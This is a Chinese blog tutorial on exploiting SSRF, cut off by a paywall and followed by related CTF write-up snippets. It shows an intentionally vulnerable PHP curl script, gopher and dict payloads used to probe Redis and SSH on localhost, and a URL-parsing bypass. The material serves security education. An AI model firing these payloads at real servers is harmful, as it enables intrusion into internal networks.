ctf 监听端口_SSRF 漏洞分析与利用(含 CTF 例题)

最新推荐文章于 2024-09-26 20:26:59 发布
最新推荐文章于 2024-09-26 20:26:59 发布
阅读量1.6k 收藏 2
点赞数
文章标签: ctf 监听端口
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33404919/article/details/112889660
版权
本文详细介绍了SSRF(Server-Side Request Forgery)漏洞的产生、利用方式,以及如何通过gopher、dict等协议进行攻击。通过实例展示了如何利用SSRF漏洞攻击Redis、获取内网信息,并给出了防御措施和CTF例题解析。
摘要由CSDN通过智能技术生成

原标题:SSRF 漏洞分析与利用(含 CTF 例题)

16004488

总结了一些常见的姿势,以PHP为例,先上一张脑图,划√的是本文接下来实际操作的。

一、漏洞产生

以curl为例,漏洞代码为ssrf.php

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $_GET['url']);

#curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);

curl_setopt($ch, CURLOPT_HEADER, 0);

#curl_setopt($ch, CURLOPT_PROTOCOLS, CURLPROTO_HTTP | CURLPROTO_HTTPS);

curl_exec($ch);

curl_close($ch);

?>

二、 利用方式

首先查看curl的版本和该版本支持的协议

[root@localhost html]# curl -V

curl 7.29.0 (x86_64-redhat-linux-gnu) libcurl/7.29.0 NSS/3.21 Basic ECC zlib/1.2.7

libidn/1.28 libssh2/1.4.3

Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtsp

scp sftp smtp smtps telnet tftp

Features: AsynchDNS GSS-Negotiate IDN IPv6 Largefile NTLM NTLM_WB SSL libz unix-

sockets

可以看到该版本的curl支持很多协议,其中gopher协议、dict协议、file协议、http/s协议用的比较多。

ps:上面的漏洞代码ssrf.php没有屏蔽回显,所以利用姿势比较多

gopher:gopher协议支持发出GET、POST请求:可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议。

先监听本地2333端口,然后利用gopher协议访问

[root@localhost ~]# nc -l -vv 2333

Ncat: Version 6.40 ( http://nmap.org/ncat )

Ncat: Listening on :::2333

Ncat: Listening on 0.0.0.0:2333

Ncat: Connection from 127.0.0.1.

Ncat: Connection from 127.0.0.1:47726

[root@localhost html]# curl -v 'http://127.0.0.1/ssrf.php?

url=gopher://127.0.0.1:2333/_test'

[root@localhost ~]# nc -l -vv 2333

Ncat: Version 6.40 ( http://nmap.org/ncat )

Ncat: Listening on :::2333

Ncat: Listening on 0.0.0.0:2333

Ncat: Connection from 127.0.0.1.

Ncat: Connection from 127.0.0.1:47726.

test

可以看到数据发送了。一开始感觉反弹传输数据没多大用,后来看了gopher和dict攻击redis和脆弱的内网应用的exp才明白

dict:因为ssrf.php的漏洞代码有回显,所以浏览器直接访问

http://4o4notfound.org/ssrf.php?url=dict://127.0.0.1:6379/info

即可看到redis的相关配置。

http://4o4notfound.org/ssrf.php?url=dict://127.0.0.1:ssh端口/info

即可看到ssh的banner信息

如果ssrf.php中加上一行屏蔽回显的代码“curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);”,那么这种方式就失效了,

最低0.47元/天 解锁文章
yoh sk
关注
SSRF漏洞浅析+ctfhub简单实战
wo41ge的博客
03-27 1万+
花时间 写一下SSRF 凑合看吧 2020/3/24 14.26 漏洞原理 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形成并由服务端发起恶意请求的一个安全漏洞。 正是因为恶意请求由服务端发起,而服务端能够请求到与自身相连而与外网隔绝的内部网络系统,所以一般情况下,SSRF的攻击目标是攻击者无法直接访问的内网系统。 ssrf csrf 重放攻击 换行注入 漏洞成因 SSRF漏洞的形成大多是由于服务端提供了从其他服务器应用获取数据的功能而没有对目标地
CTFHub技能树_SSRF_Bypass
m0_54525483的博客
08-12 447
这是一个新手的做题笔记,记录一下做题的解法。 1.什么是SSRF? 很多web应用都提供了从其他服务器上获取数据的功能,根据用户指定的URL,WEB应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务器端请求伪造攻击(Server-side-Request Forgery,SSRF)。 如何形成: SSRF形成的原因大都是由于服务器提供了从其他服务器或应用中获取数据的功能,但没有对目标地址做出有效
ssrf原理及ctfshow例题
2301_80499103的博客
05-28 898
1.ssrf的原理SSRF (Server-Side Request Forgery,服务器端请求伪造) 是一种由攻击者构造请求,由服务端发起请求的安全漏洞,一般情况下,SSRF攻击的目标是外网无法访问的内网系统,也正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔绝的内部系统。也就是说可以利用一个网络请求的服务,当作跳板进行攻击。攻击者利用了可访问Web服务器(A)的特定功能 构造恶意payload;
SSRF(服务器端请求伪造)的学习以及相关例题(上)
2401_82388450的博客
05-13 1087
SSRF(服务器端请求伪造)是一种由攻击者构造请求,由服务端发起请求的安全漏洞。一般情况下,SSRF攻击的目标是外网无法访问的内部系统(正因为请求是由服务端发起的,所以服务端能请求到与自身相连而与外网隔离的内部系统)。
SSRF类型的CTF题目[De1CTF 2019]SSRF Me1
最新发布
weixin_73049307的博客
09-26 768
第一个if要求传入的action中有scan,然后调用scan函数从文件中查找param这个文件,将文件名给resp,然后通过tmpfile函数写入result.txt中,且令它连通。我们已知flag在flag.txt中,而且最终要通过/De1ta中的param来得到,所以/De1ta中的param=flag.txt。第二个if要求传入的action中有read,然后从result.txt中查找连通的文件作为f,并让result['data']=f.read得到它的内容。
实战 | SSRF攻击内网的实战案例
weixin_43167326的博客
02-03 1030
推荐查看: 实战 | 记一次SSRF攻击内网的实战案例 实战 | 记两次应急响应小记 干货 | Wordpress网站渗透方法指南 实战 | 记一次CTF题引发的0day挖掘 2023年零基础+进阶系统化白帽黑客学习 实战 | 记一次邮件系统C段引发的SQL手注和内网渗透
SSRF题目复现
qq_40909772的博客
11-19 2759
1. [HITCON 2017] SSRFme。 题目平台地址:https://buuoj.cn/challenges 进入题目环境之后是代码审计,代码如下: 59.49.169.109 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_AD
nssctfSSRF刷题记录
夜未至
06-23 921
file_get_contents — 将整个文件读入一个字符串。
CTF之web学习记录 -- SSRF
lifanxin的博客
06-29 1988
SSRF概述SSRF原理SSRF漏洞修复一道例题总结 概述   SSRF(Server-Side Request Forgery)服务器端请求伪造,是一种由攻击者构造请求,服务器端发起请求的安全漏洞。当然之所以要这样曲折,是因为SSRF的目标一般是外网无法访问的内部系统,所以需要用服务器端发送。 SSRF原理   SSRF形成的原因在于服务器端提供了从其它服务器应用获取数据的功能且没有对目标地址做过滤和限制。通过该漏洞我们可以攻击内网的服务器,获取相应的资源信息,利用file协议读取内部网络文件等。   如
ctfhub中的SSRF相关例题(中)
2401_82388450的博客
05-23 990
用户在应用程序中输入一个 URL,应用程序解析该 URL,发现它使用的是 "gopher" 协议,应用程序将该请求转发到目标服务器,并将请求数据以 Gopher 格式发送,目标服务器接收到请求后,根据 Gopher 格式的指令执行相应的操作。HTTP协议是浏览器和服务器中间件进行数据交换的协议,浏览器将HTTP头和HTTP体用某个规则组装成数据包,以TCP的方式发送到服务器中间件,服务器中间件按照规则将数据包解码,并按要求拿到用户需要的数据,再以HTTP协议的规则打包返回给服务器。
CTF刷题记录Buuctf-N1BOOK-SSRF
m_de_g的博客
06-23 1563
** N1BOOK-SQL2 ** 一、解题思路 1.查看页面源代码,发现了challenge.php 2.在进行ssrf攻击之前,先进行一波代码审计 3.根据题目要求,访问本机的flag.php,本道题是用了白名单的方式,通过parse_url()后分解出来的IP不能为白名单内的IP,所以我们主要需要绕过parse_url(),在线php调试 4.构造的payload为:http://fghkk@127.0.0.1:80@baidu.com/flag.php 5.当我使用get传参的方式时,
[De1CTF 2019]SSRF Me
怪味巧克力的博客
07-14 207
0x01 题目给出了源码,我们看一下源码 #! /usr/bin/env python #encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) s
IP限制绕过及gopher对redis的利用讲解
weixin_41489908的博客
10-03 919
你崩溃到凌晨,她和他睡到自然醒。。。 ---- 网页云热评 当对外发起请求时,会存在一个安全限制,比如去检测IP地址,去访问自己是不是127.0.0.1,相当于去访问内网段是192.168以及172网段。这种内网有非常明显的一个特征的,有不同的过滤存在,有的时候为了去绕过这些过滤,需要做出一些对应的方法以及策略去实现。 绕过 1、添加一个端口 限制情况下不允许纯IP的形式,默认情况下IP是80端口,比如访问的是99端口是可以的,一个加端口的操作,就可能去突破它的规则限制,当...
2020易博霖CTFWeb2--SSRF题解
flying_bird2019的博客
04-01 2409
Web2 SSRF (靶机服务器已关闭,因此没有截图) 观察题目url index.php?file=WTNSbWFXMWhaMlV1YW5Cbg== 将参数file 进行两次base64解密得ctfimage.jpg 网页输出了上述图片 尝试读取index.php源代码,将file改为YVc1a1pYZ3VjR2h3(index.php两次base64加密) 转到后发现图片无法显示,猜测应该是文...
CTFHub-SSRF部分(已完结)
热门推荐
feng的博客
09-14 1万+
内网访问 根据题目意思,让我们如访问内网的flag.php,因此抓包进行访问,即可得到flag: 伪协议读取文件 根据题目的意思我们需要使用URL的伪协议去读取文件,那么我们首先要了解URL的伪协议。 URL伪协议有如下这些: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 具体的用法请参考SSRF中URL的伪协议 这里我们使用file伪协议从文件系统中读取文件,我们直接抓包读取: 这里其实有点考常识了,因为网站的目录一般都在/var/ww
CTFHub-SSRF(全部)
1stPeak's Blog
08-01 3253
文章目录内网访问伪协议读取文件端口扫描POST请求 内网访问 解题步骤 伪协议读取文件 解题步骤 端口扫描 提示: 根据提示对目标端口进行爆破 注:使用字典也可以,用for循环写一个字典出来,还有就是爆破时线程不能太高,太高容易失败,无法爆出来 POST请求 注:中途靶机重启过一次,网址有些改变,不要在意,看payload即可 解题步骤 根据网上的一些内容,他共有3个php文件,分别是flag.php、302.php、index.php http://challenge-d01e92
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结
Love&Share
09-28 6802
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
Web安全之服务端请求伪造漏洞
qq_52358808的博客
09-26 1971
服务端请求伪造(SSRF)漏洞 SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形成由服务器端发起请求的一种漏洞。从客户端发起一个请求到服务端,服务端再向另外的服务端发起请求的过程称之为服务器端请求。让服务器去请求你通常请求不到的东西。一般用来在外网探测或攻击内网服务。 常见类型 有回显:从页面中可以看到返回内容。 无回显:无法从页面中看到返回内容。 SSFRF漏洞1.原理1.1.成因1.2.场景1.3.相关函数2.利用3.危害4.防御 1.原理 .
CTFHub-Web-SSRF练习
Atkx's Blog
10-18 6724
这里写自定义目录标题内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议 内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 访问靶机地址,发现url后面多了/?url=_ 然后访问127.0.0.1/flag.php Payload: ?url=127.0.0.1/flag.php 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。 Payload
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值